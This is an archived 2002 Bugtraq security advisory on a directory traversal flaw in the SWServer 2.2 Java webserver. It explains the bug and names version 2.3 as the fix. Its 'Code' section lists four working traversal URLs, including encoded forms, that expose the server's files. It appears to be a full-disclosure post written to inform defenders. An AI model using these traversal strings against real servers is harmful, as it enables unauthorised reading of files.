SWServer 2.2 directory traversal bug
From: Bugtest (aluigi@pivx.com)Date: 08/28/02
- Previous message: Drew: "RE: White paper: Exploiting the Win32 API."
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: Bugtest <aluigi@pivx.com> To: bugtraq@securityfocus.com Date: Wed, 28 Aug 2002 19:46:58 +0000
######################################################################
Auriemma Luigi, PivX security advisory
Application: SWServer
(http://www.geocities.com/tlhome2000/swserver.html)
Version: 2.2 and previous
Bug: Directory traversal bug
Risk (high): An attacker can view and "surf" in the directories of the
remote server and view all the files in it.
Author: Auriemma Luigi, Security Researcher, PivX Solutions, LLC
e-mail: aluigi@pivx.com
######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
5) Philosophy
______________________________________________________________________
1) Introduction
Swserver is a small free webserver totally written in Java.
It can be considered just like a tiny webserver for tests or for be
used by single users that don't want to lost their time in
configuration files.
______________________________________________________________________
2) Bug
The bug is a directory traversal bug that let the attacker to use the
remote server like a new read-only drive, all readable with a browser.
The bad characters that can be used for exploit the vulnerability are
'\' (%5c) and '/' (%2f).
______________________________________________________________________
3) The Code
I suggest to try only these links and then follow the directories with
the browser:
http://host/%2f%2e%2e%2f
http://host/%5c%2e%2e%5c
http://host/..\
http://host/../
______________________________________________________________________
4) Fix
SWserver 2.3 from its homepage:
http://www.geocities.com/tlhome2000/swserver.html
______________________________________________________________________
5) Philosophy
I'm really hopeful about the FULL-DISCLOSURE policy, because with it
"everyone" can know the real effects of an attack, the real danger of
a bug, someone can learn a bit of creative programming (I have learned
a bit of interesting C from the source code of some published
exploits under this policy) and it's useful for all the people that
are hopeful in this type of disclosure.
No secrets!
______________________________________________________________________
About PivX Solutions
PivX Solutions, is a premier network security consultancy offering a
myriad of network security services to our clients, the most notable
being our proprietary Risk and Vulnerability Assessment (RAVA).
Dedicated PivX founders have also developed the patented Invisiwall
network security device which offers the most comprehensive and secure
intrusion detection system available.
For more information go to http://www.PivX.com
Any type of feedback is really welcome!
Byez
-- PivX Security Researcher
- Previous message: Drew: "RE: White paper: Exploiting the Win32 API."
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
